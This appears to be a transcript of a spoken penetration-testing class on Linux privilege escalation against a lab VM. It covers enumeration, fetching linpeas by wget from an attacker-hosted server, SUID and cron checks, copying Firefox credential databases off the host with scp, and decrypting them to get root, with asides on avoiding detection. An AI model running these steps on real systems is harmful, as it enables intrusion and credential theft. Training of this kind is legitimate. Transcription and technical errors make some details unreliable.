ठीक है. So let's continue again. I close this tab. Okay. So last time we got the access. I mean, after performing some enumerations and everything, we found a user, and the username was Elliot something, right? And also after using password cracking, we found Elliot 123 as the password that is available to us. So now what we'll do is we'll try to log into this account and see, and try to perform privilege escalations. So just remember, this machine is Linux machine. So as this is a Linux machine, and we'll try to perform Linux privilege escalations. So here are some topics that we'll be covering up for the Linux privilege escalation. I'll be teaching one by one, so don't worry. So first I'll try to do the SSH into it. Elliot 123. Okay. Who am I? It says Elliot. Okay. We'll try to get the stable shell. So Python -c import pty dot spawn bin bash. Okay, we got the stable shell now. Okay, so when we perform a Linux privilege escalation, the most important thing that we do is we do not directly do privilege escalations, that is from low user to high user. We always try to find more and more details about it. See, after you enter into a computer or a target, you do not directly start with exploiting. We first try to identify what is there, who is there. Like there are multiple parameters that we need to identify. So I always do that. Like I always call this phase to be very important phase, gathering information. So let's try to find out. Now there are few methods I've mentioned here. So first we'll try to find the host name. So the host name, it says Insanity VM. So let's make a note of this, because see, you never know when this information will be useful for us. So host name, it says Insanity hosting.vm. The next thing that we'll try to find out is uname -a. Uname is very good when you want to do kernel exploits. So I'll explain what is kernel exploits also. So with the help of uname, what happens is you come to know what different things are there. Now here, so you won't get any details, but there are multiple ways also where you can do. So if I just say uname, it says Linux. If I say uname -r, it gives me the range, that is the available version. So I'll just say uname -help and see how many more parameters are there. So we can say uname -a. That is the thing what we did, and then we can say uname -s, that is for the kernel. So it will print out the kernel name, that is Linux. So with the help of uname, we came to know that it's a Linux, and then the machine name is insanity-hosting.vm. Okay, so I'll make a note of this also. Uname copy, sorry, and then paste it here. Okay, so one second. Uname. So the next thing that we'll try to find out is the version. Now there are multiple ways also to find the version. So if I just say cat prawn, so it's almost the same result what uname gives you, but in a more what you say more useful way. So the main thing that the process version will give you is about the GCC. Now GCC is a type of a editor which is there in all the Linux, especially in the CLI, to run C++ or C programs. So just to remember all these points, I'm just telling you. So proc version or the GCC version, we can make a note of that also. See, what happens when you download any source code from the internet for privilege escalation? At times what happens is you download the source code, but the C++ code and the C++ version that is pre-installed in the target OS. It doesn't match. So that time it is very difficult, to even execute. So yeah, that is one thing. The next thing is we need to check the Python version. So the only way to check the Python version is hyphen Python hyphen version. So yes, it has Python 2.7 also. So I'll make a note of this. So let's check for Python 3. Python 3 hyphen version. So there is no Python 3. So we have to be very careful now to find exploits that only Python exploit that only run on 2.7.5 and any C or C++ exploits that run on GCC version 4.8.5. So we need to be very careful. We can also locate them, like we can just say locate Python. It's always then user share user bin folder. Okay, so we can locate it through here. So this is the Python ka directory user bin 2.7. Okay, so we'll make a note of this guy also, just to be on safe side. So Python 3 is not there. So let's write it down. Python 3 not available. Okay. The next thing is etc issue. So with the help of etc issue, we come to know the different the hostings basically. So if I just type cat etc issue, it will tell me it is Kali Linux. So basically it will tell you like who is the OS ka, from where you have downloaded, you have got the OS. So with the help of cat etc, we just come to know it is just kernel. So it's a proprietary or developed OS only. So nothing much great information about this. Then we can check for ps command. PS command will tell you the different process IDs also. So what does it say? Unknown user defined format process ps. So we have only two process IDs that are being executed right now. So the reason why I'm saying is there are some exploits where you can just overlap them with the existing process IDs and run them also. So nothing much information with the help of process ID. Then we'll try to find the environment. So we can just say env. So with the help of env, we come to know multiple details like the shell is bin bash, then the path. So make a note of this. Okay, see, there is something called as path. Now usually what happens is sometimes as a normal or a very low privilege user, you are not able to run the particular applications. So that time, if you mention or specify the path, that is, for example, if I'm not able to execute any Python ka code, so if I mention user /bin /python 2.7.5 and then Python ka file, so it will execute it properly. Yeah. So this is about the environment. Okay. Then we come to sudo -l. So okay, it's asking for password. Okay. So when I say sudo -l, so basically with the help of sudo -l, you come to know what applications you can run it as a super user. So right now it says, sorry user alert, you may not run sudo on Insanity hosting. So yeah, we are not allowed to run anything. ID is used to tell you what is the ID. So this is one thing. Then we can try with the best one, that is etc passwd. etc passwd will tell you the different users also. Now we have a user called as monitor also. See, then we have a user called as Nicholas. We have user called as Otis, Nicholas, Elliot, which is we are currently. So I'll just show you. See, Elliot ka UID is 1003. So we have other user like Otis with ID of 1001. Nicholas is 1002. Then monitor is 1004. So I'll just make a note of this. Users, I'll just say other users. We have Otis. So we have already cracked Otis ka password, so we did not focus more on Otis. Then we have Nicholas. Then we have Elliot, and we already know the password of Elliot, which is 123. Then we have monitor. So some two new interesting people we have got. Otis password 12345. So two interesting users we have found. Yeah. So the next thing that we'll try to find is the cat etc shadow. 90% times cat etc shadow doesn't work because of the permissions that we don't have. Yeah. So this is about the simple information that you need to gather with respect to the privilege escalation before performing privilege escalation. Now there are many automated ways. Let's skip this. Okay, I'll just show one more, which is called history. So history will tell you many interesting things also. Like history will tell you the different passwords. I mean different commands that were run before. See, at times what happens is if you're not able to access the log files, at least if you type history, whatever is the current session that is going on in the terminal that the user is also simultaneously using, that history can be found here. So what happens is if you just I'll just say echo my password is 123456. So is so I'll just show it again. See, what happens is whenever the user types anything now unintentionally, everything is saved here in plain text. So there are chances that you can get a username, you can get a username password, or any important information also in normal plain text if you're not able to access the logs. Okay. Now we'll try to use some of these important see, we have two ways where you can find. One is a manual approach and one is a automated approach. So automated approach now, there are very good files also available like linpeas, linenum, les, linux smart enumeration, linux preview checker. Linpeas is a very good one if you want to really save your time and do a very quick privilege escalation. Then you can try with linpeas. So linpeas, this is the domain, I mean the repository where you can get linpeas. So I'll share this repository in the group again and save it. Okay. So now what we can do is we can go to linpeas. We can go down here called as should be a page called asset. Okay. Asset releases, yeah, release, and then you can download any of the linpeas ka file. Okay, so this particular guy, I mean this repository piece.ng has linux privilege escalation as well as for the windows one also, so you can download any of them. So we'll download the linpeas.sh file, and now what we'll do is we'll download this file and we'll okay, possible so and so. Okay, fine, leave it. So it has downloaded. So what we'll try to do is we'll try to download this particular file, or we'll try to push this particular file from our local user to our target user. So first what I'll do is I'll try to copy this file into the into the home directory where I'm saving Insanity hostings. I'll just say move downloads lean piece. So it has moved to my directory now. Okay, I'll change the user permissions also here only. So chmod plus x leanpiece.sh. So the user privilege is also changed, or let's say chmod 777 leanpiece.s. So yes, now everyone has read write execute permissions. So what we'll do is we'll try to download this file from our Kali Linux machine to our Lecute machine. Okay, for that what we do is we first set up a Python server. Okay, I'll just say I'll open it here also. Okay, so python -m http dot server. So what Python, now what I'm doing is I'm creating a normal server. So whatever it is, like from my local machine I can download any file to my remote to the target machine. So this is running on port number 8000. Okay, now I cannot simply just download the file anywhere, right? I'll have to save it somewhere. So the best place to download and run temporary, I mean to do any execution, is to save it in the temp file. The best part about using the temp file is eh, any stuff you do, nothing is going to be reported. So I'll download this file now. We can use wget http. Let's see my Kali Linux ka IP address, which is 253.128.192.253.128, along with the port number slash the file name. So as soon as I hit enter here, the file has been saved. Just to cross check, you can see there has been a request from 135, that is the target server, for a get request, and it has downloaded this particular file. Now you need to be very careful. Okay, wherever you are saving the file, you need to create the server there. Or the best practice, if you are planning for OSCP and all, is you just create one particular file, call it tools, a directory, call it tools, run the server and keep it. Okay, yes Aryan? Okay, this is the best way. Now let's see the file, whether we have got the file. Yes, we have got the file. We'll change the permission now, chmod plus x. So sometimes what happens when you download the file permissions of that you have changed on one user doesn't remain the same on the other user also. So I'll just say leanpiece.sh. Let's see if the permission is changed. Yes. So let's run leanpiece now. So this will take a bit of time. Okay, this will take a bit of time to do normal privilege checks. See, with the help of leanpiece now, what will happen is all these manual approaches like kernel, sudo, suids, capabilities, cron, jobs, this will be checked, and it will suggest you whether whether kernel exploit is possible. If it is possible, then how you can do it. Sudo exploit is possible. If yes, then how you can do it. Capabilities is possible, then yes, how you can do it. Yeah. But this is a very time taking task. You need to go through each and everything. Like each and everything. So the first thing it did was about system information. That we have done. We have already done this part. Right? Let's go to the main thing only. That is the kernel. Let's see. One second. Let me analyze this file first. Network information. Whatever we have done the manual stuff, right? That is information gathering. This has been done by this guy, done by this leanpiece only. But the only thing is we need to analyze each and everything line by line. I'll explain you one second. Let me just see the important parameter first. Okay, capabilities is there. Okay, very fine. Okay, lean piece of equipment. Okay, okay. So, what I'll do is I'll explain you each and everything now. This is like a complete task to analyze it here. So, what is the first thing? The kernel exploit. So, kernel exploits are very good exploits. So, but yeah, see, kernel exploits, 90% they don't work. Okay, so you have to be very sure. And the best kernel exploit is dirty cow, which is there available and it works. Okay, and kernel exploits are basically your C program files only. So if you want to run a kernel exploit, then you need to be very sure that you are having your your GCC also. So we can just say uname hyphen a or hyphen r. Hyphen a is better. We can copy the kernel, that is this version. We can copy this entire thing, copy, go to the tab and just type, press enter. So we can type something like exploit. So it tells us, so there is a exploit which is available for this particular version. So before we execute the exploit, we need to understand what this exploit is doing. So there is a note also available here. We can read this exploit, what it is doing. Okay. There is no POC written here. Okay, yeah. It's a linear distribution. So okay. Okay. Okay, nothing much great information on this page actually. Okay, this is the proper one. Okay, so I guess it is trying to embed the shell code directly into the root and get the privilege. So let's try this code. Okay, let's try. I hope it's the same exploit number. 1253. 1253. See, Aryan, one more thing to remember. Do not directly download the exploits from exploit DB, okay? Because what happens is these exploits are sometimes configured also. The best way to get the actual exploit is just copy the CV number, go to Google, paste it and just say GitHub. So the advantage of doing this is you'll directly get the GitHub CV I mean the C++ file only. So this is one best thing. So right now we'll download this exploit. This exploit is downloaded, and we'll rename this exploit to say exploit 1, and we'll go to the folder and we'll try to move the exploit to the server hosting file. So let's say exploit 1. So exploit is there. I'll just change the permissions of the exploit 777. Okay, I'll go to this to the target OS, and I'll just say wget http 192.168.253.120 128. Okay, let's confirm if the exploit is, yeah, it is done, it is copied, it is downloaded. So where is it? Okay, we need to change the permissions also here. So now the permission is changed. Okay, so the best way to do is we use GCC. Since we have GCC, right, we'll see the version. Okay, GCC, then the file name hyphen o exploit. Okay, let's locate GCC and see. So, oh, bad luck. GCC is not installed actually on this. There is no GCC. So there is no there is no directory called a user bin GCC. So sorry, we cannot run GCC. Let's. So this was one hoax that they gave us. Not available. Not available. Yeah. So what we'll do is we'll skip. I mean, not skip, but let's check something else. So this is how you do like kernel exploit. So first you find the kernel like kernel version, then you paste the kernel version in the directory, directory as in the I mean you paste the kernel version in the Google and you find it out. Now we'll try to find out something called capabilities. Okay, capabilities are very good vulnerabilities to uh, to escalate to do privilege escalation. So for the capabilities, now I'll explain what is capabilities. Okay, so capabilities are basically nothing but binaries, system level binaries that basically tells you the privilege and the non-privilege processes that are going in the computer. So capabilities are basically like you can just consider them to be permissions that divide the privileges of the kernel user and the kernel level programs. So kernel user and kernel level programs is like a person who is basically executing the program in the memory, or let's say a user who is executing the program in the memory. Yeah. So to check the, uh, the capabilities, we use a simple command. Okay, that is find slash permissions hyphen u is equal to s, then type to files type files. Okay, I missed out this line also. Okay. So what does this code do is it will find for the permissions where the user has the super user permissions, and the type of and the type that it will find is files. See, I'll tell you why I mentioned files here. Okay, when once we get some results, okay, then this is used to dump all the error or checksum errors in the dev null directory. Okay, so I'll just press enter. So now it has told me like these are so many available capabilities where a user can run as a super user. So the best website to check all this is GTFO bins. So GTFO bins is basically collection of all the binaries, uh, binaries where all the exploits are there. Now we can try out. We can just search for this, copy, paste it here. So there is no such binary for this. Even for this also there is no binary. Then let's search for this guy. No binary. Let's search for this. Okay, let's search like this. Su. So for su, for super user we have, that is sudo su. Sudo su. Okay, fine. We'll try out this. Okay, we'll try out this. So if I just say sudo su. Okay, Elliot is not a sudo's file. The incident will be reported. So we need to be very careful when we are doing this in real-time testing. Now we'll try with sudo and see. Oh, okay, this was the same link sudo. We'll try with cron tabs and see what we get. We'll check for cron tabs also. Cron cron tabs. We can try executing this code. Okay, not. So capabilities, basically you need to be very careful. That is, you need to use this particular code, I mean this particular syntax, and paste it, I mean type it out, and then you need to go to this website called GTFO bins. Very excellent website, okay, to do cron tab exploitations, I mean to do GTFO exploitations on capabilities. So I'm sending this code to you, or else I'll do one thing, I'll just send it everything at once only to check. Then go to gtfobins.github.com, and you can check out. See, the best part of GTFO bins is it will tell you like how to do the exploitations also. Like for example, I'll just show you one. I'll just show you one. Like I'll just show you one example of soup. Not this. Better one I'll show. Shell. Okay, this one. So with the help of with the help of this GTFO bins, it will tell you how to do one line by line exploitation, how you need to write, how you need to perform and all. Okay, so as soon as we'll be solving the labs now, we'll find n number of available GTFO, I mean available capabilities, and based on that we need to perform, we need to do testings. Yeah. Now, the reason why we do capabilities check, I mean capabilities is, so capabilities have a very good identification methods where it tells you like on what a normal user can run a code with super user privileges. So if you're able to crack it down now, then just by without getting reported also you can perform capabilities and you can get the super user access. So this is like a completely hidden type of a what you say privilege escalation method. Yeah, any doubt, Aryan, with respect to capabilities? Okay, so here also I'll just say uname hyphen a. Okay, now we'll check for cron jobs. Okay, so cron jobs is a very slow task vulnerability, I mean privilege escalation method. uh, you need to be very patient, you need to have very patient to to perform cron jobs. So cron jobs are like what, they are like some scheduled task. Now scheduled task matlab, if I have, as a super user, I have configured my system in such a way that my system needs to go in sleep mode after 5 minutes. So I define it, right? And in Linux, this type of definition is called cron jobs. So cron jobs are mostly used by system admins. So system admins, they do it they do it because what happens is sometimes in manual times you forget to keep backups, right? So what the system admins do is they will just set up a scheduler program, and schedule a program based on the time duration whatever it is and the path that it needs to execute. So if we're able to do that now, then what we can do is we can override, if we have the specific permissions, then we can override that particular file. So this is about cron tabs. Now the best way to check cron jobs is we just type cat etc cron tabs. Okay, now unfortunately we do not have any cron jobs available right now for us. So if if there was a cron job available, then we could have run that particular program or modified that program. I'll show the cron job wala one example, okay, in the other lab which I have set it up. Okay, so list the available, what to say, available scheduled task cat etc cron tabs. Yeah, now based on that, we, if we have a specific permission, then we can modify and modify with a reverse share payload or some malicious payload or some backdoor also we can keep, right? Yeah, any doubt, Aryan? So sudo and suids, these are responsible, these are mainly dependent on capabilities. So we tried, right, we tried to just enter sudo su, we enter the password, so we did not have the permissions, right? So just by typing sudo su we can just go from low privilege to high privilege user also. So 90% now this doesn't work, but some people, you know, they have that habit, so better to check it out. But the only thing is, when you type sudo su, if it doesn't work, if anything malicious thing is detected, then it will be reported. So even if you're solving the labs, you need to be very sure that you are solving the labs with respect to the uh, real-time environment perspective also. Yeah, now we'll try to do something called as path variable privilege escalation. Okay, so path variable privilege escalation and SUID, they're very much similar with each other. Now we can use uh, we can use a tool called as getcap. Now getcap and capabilities, they're very similar with each other, but the exploitations method is very different. Now what getcap will tell you is, getcap will tell you, like, as an unprivileged user, what uh, what capabilities or what task you're allowed to do without getting without even your super user's permission. Now the chances of using get path variable is, uh, it will just it will not report, right? So the main intention of doing privilege escalation is really what, you know, whatever task we do is not reported. So getcap is a very good method, you know, to find out. So I'll just say getcap hyphen r. So okay, fine, one second, huh? I think it's getcap hyphen r. Back. So getcap hyphen r will tell you all these things, like, so very much similar with respect to capabilities, but yeah. So getcap will check for everything here, and the best part is it won't be reported. See, we need to be very sure now to select the appropriate one. Now how do we do that is, we go to GTFO bins, and I'll just type here PING. So there is nothing for PING. Then I'll check for ARPNG, RPNG, RPNG, nothing for that also. So getcap is a very, you know, like in Active Directory we say that golden ticket attacks. So similarly, getcap is very important. I mean, if it works, and it works very perfect. I'll share the checklist also with you. Okay, after this session, Aryan, I'll share the checklist what I have prepared, what I basically use in during my testing for Linux. Yeah, I'll send you that. Now what we'll do is, we'll so getcap, that is path. So getcap hyphen r slash. Okay, if I just mention hyphen r, or I can mention like this also, getcap hyphen r, like this. So this will check in all the directories, and this will check from the root side of the directory, like For this, you need to have a root privilege, which we don't have. But I'm just giving it for your understanding. Okay, these are some very few Linux privilege escalation methods. Okay, we did run lean please, right? Let's see again. We'll try to run lean please and see. We'll see what what uh, what things that we have missed manually, and lean piece is giving it to us. Okay. Okay, let's read one by one and see. We'll analyze it. Okay. You need to be very smart to analyze this each and everything. So if you're not able to find anything now, just take your time and go through this file, because this lean piece now gives you very detailed resource or detailed structures of the exploitation methods. Right. So where was it down? Okay. Okay. So it says dirty cow exploit is possible, but we did try. We did try. Did not work for us. So we can try individual each and everything. And pawn kit is also a very good way of exploitation. But if you need to be very sure. Okay, just read this message called as exposure. So it says highly probable. Matlab it is telling ki yes, it can work. So before you try running the exploits, just read, just check this message called as exposure. And if you really want to try, you can just download this exploit db ka file and you can try it out. Yeah. So some it says highly probable, some it says probable, some says less probable, and some says do not even try it out. So we can try out each and every exploits here, and we can run and see. So this is one good thing about lean piece. Yeah. See, less exposure, less probable, less probable. Yeah. Now it's suggested on exploit, that is to use this. We can try out this. We can try each and everything. So similarly, it did check for the processes. So we can check each and every process that was actually that was running in background, that the user might have or super user might have ignored, right? So it's a very lengthy file actually to read. Okay, so let's see this also. Okay, firewall. Okay, leave it. This was the network information that we got. We already tried MySQL exploit, and we got different users also. That is system, root and LUT password, encrypted password. So okay, we can ignore this also. Okay. Searching for uncommon password, Splunk, analyzing GitHub, analyzing GPG. So this is one hash we got of somebody, right? Webmin. But we don't need webmin because we already logged in as Elliot. So we can save it. We can save this and keep it. You never know when it can be useful for us. Then uh, ठीक है. So we need to read each and everything. Okay, we have something of firewall also, like VNC server XML. Okay, other interesting files, .brc, files with interesting permissions. Okay, okay, okay. This is about the capabilities. We had done the capability check, right? So nothing much suggested by even by uh, even by linpiece. Then pass the profile.d. Nothing interesting here. Okay, searching for root files in home directories. Okay, we have one file directory called as bash history also. We'll save this and keep. Okay, I'll just save it here. Let's see what interesting we get in this directory. Interesting file, writable file owned by me or writable by everyone, not in home. So lean piece though already there. Okay, we can ignore this because we tried to run the exploits. Then we have one file here, JSON file. This looks to be interesting. Executable file potentially added by user. So let's copy this also and save. Let's see what is there in this file. Uninstall.sh, then CSS. We can check for this file also. Yeah, TTF. These are the font files. Okay, just be careful. TTF files also have username passwords at times. Okay, cron. Okay, it says there is a file called as all these files, some Mozilla and everything. We'll check these files also. Okay, X authority and all. We'll check all these files. This is in which directory? In home directory. Okay, files inside other home directories. Search file, mail application, send mail, post mail. Okay, we can also check these files. Okay, root. Okay, okay. Config.back. We can check this also file. This is the backup file. So we can check this. We can check for the different details. What is there inside the config file? Backup.js also we can check. I feel this file will have some unnecessary stuff. I mean the source code only, nothing much important. .db file. Okay, searching tables inside readable .db SQLi. Okay, there is a cache file also. We'll save this and we'll check. This is for Firefox. So let's check this file also. Okay, cert9 file is also there. Okay, certifications are there. We'll copy this. If you get cert9 file, just be very, what you say, confident that you can do any number of stuff. Then we have permissions. Okay, there is lot of thing inside Mozilla Firefox, so and so directory. We will try to find each and everything inside this directory. Okay, so let's start only directly. cd/home. Sorry, cd/home. Okay, I think it's a hidden directory, so we'll use ls-al. cd Elliot. So we'll go inside this directory and see cd. What was the other directory path? Mozilla Firefox. Okay. Let's see in the extensions also. Firefox. Then how many directories do we have in this? Let's see. We have this directory and this directory. Let's check this directory. So the method that I'm doing is called as lateral movements. Okay. So I'm checking each and everything in detail, line by line. So we have n number of stuff here. We have cert file also here. Okay. Then we have key dot. Okay, let's do one thing. We will try to download this file from our machine and we'll try to open it in our Kali Linux, because in Kali Linux we have, by default we have MySQL installed, right? Aryan, you there? Okay. So what we can do is, we cannot set up a Python server here. So the best way to do is, we can use something called as SCP. So sorry, not this, SCP for file transfer. Now remember, SCP is only possible if you have port number SSH open. Okay, so SCP can actually help you to transfer file from remote to the local. So let's see how we can do it. So SCP okay. So let's try out this. So I'll do one thing is, I'll copy this directory. One second. SCP, let's say Kali @192.168.253.127. I'll assign a port number. Is it port number required to be assigned? No. Then I'll just say path to the file. I'll just say home. Alright, what happened to this? CP Kali 192.253.127 home / Kali, and then the file name cert9.db. No route to this port. Okay. 128, sorry. Okay, SCP Kali @192.168.253.128 Kali's. Then the file name. The file name is okay. Connection refused. Just a second. Let me check how we can do it also. Okay, let's see it with this method. SCP cert9 Kali is it Kali or root 128 home slash Kali. Lost connection. Okay, let me try to, just a second, I'll try to log in again and see. One 68 253.128. Connection refused. Okay, let's see if our port number 22 is open in Kali Linux or not. Connection refused, port 22 SCP is blocked by firewall. Okay. ठीक है. Okay, so I guess SSH was not there in Kali Linux. So we'll try to figure out this error first. Okay, it is running. So we'll try it now. We'll try this now. The same thing. Yes. Kali. Yes, it is done. Yeah. So we can go to cd home Kali and check for the file. Where is it? Where did I save it? Desktop, sorry. Desktop, yes. Thank you. So yes, we have saved this file. So let's try to do cat and see what it is. So okay, fine. With cat we are not able to do anything. So we'll figure out. Okay, we'll figure it out. How to open cet9.db file in Linux. Okay, extract cert9. Okay, certutl, no, not certutl is the best thing. Okay, let's see how do we do that. Okay. Okay. Let's do one thing. We'll try to download the entire database stuff only here. That is even this files also. So this also, and then we'll try to download one more file called as cookies. So let's see what we get. Okay, cookies. Okay, let's go here and see. So we have 3 different files. So I'll just make a copy this file inside one. I'll move these files inside the directory. Cert9 cookies, then key to insanity hostings. Okay, we have these files now. Now since this is a Mozilla Firefox database file, so there are multiple tools available. So the best tool that I remember, we can get is called Firefox Decryptor. Okay, so we can use any of them. So we'll use this one, Firefox Decryptor, and we'll try to figure it out. Okay, so okay, the Python file is here. Python Firefox -help. Let's see. Okay, so what type of files can we import here? Let's read. CSV files, password always with login. Let's try executing and see. Okay, what does it say? Profile is not found. Do we have a profile something here? Profile or init file, anything? Okay, nothing import, nothing. Any interesting file? Like login also. Login is there. Let's see with the logins also. We'll try. See, this is all about trial and error method. Okay, uh, everything into every possibility is into try out. So let's move the file. Stop. Okay, we have logs on, so also is there. Let's save everything in one single folder. We'll just say creds mkdir creds move certain cookies key log okay, let's go to creds. Okay, done. Let's go to Firefox decryptor and see. Okay, we got one username and a root user and a password also for this. Yes, can you see, Aryan? We got this. Now what we can do is we can do very simple thing is we can just copy. We can do SSH also is fine, or else we can just say sudo su and you can enter the user the root password. Okay. Oh, sorry. Oh, sorry. What we can do is we can just say su and then we can enter the password here. So now we are root user. So yes, so this is a very tricky type machine that we have done. So I'll explain you what we have done. Okay, we tried with different Linux privilege escalation methods. Nothing worked for us, but with the help of linpiece that we have run previously, it told us that there is a file for Microsoft Firefox, Mozilla Firefox, which has all the history. See, these types of files, you can relate these particular files with the saved we have right on browser where we can save the passwords, right? The login password files. So it's almost the same as that files only. Now what happens is when you save your username password in your web browser, these particular files are stored in some directories with respect to your Firefox, Google Chrome or Brave, and they are not encrypted. Okay, so sometimes we can what we can do is we can just, it's a trial and error what we have done. So we can just go to we can just download the different files from the account, and we can perform we can use some decryptor files. See, now what happens is if I just go to this passwords and say password manager, it won't allow me to open this file until unless I don't enter the credentials, right? So here we need to break into the authentication. So that's how we use this particular tool. So even we have for edge also, Microsoft Edge decryptor. So even for Microsoft Edge decryptor also we have like extract and decrypt browser passwords. So this is like a completely different style of privilege escalation from low privilege to high privilege also. So yeah, Aryan, any doubt what we did? So now we are root user. So you can say who am I, and IPA, and I can just say host name. So it says root. This is the IP address, and this is your, yeah. So this was about today's class, Aryan. Very short class today.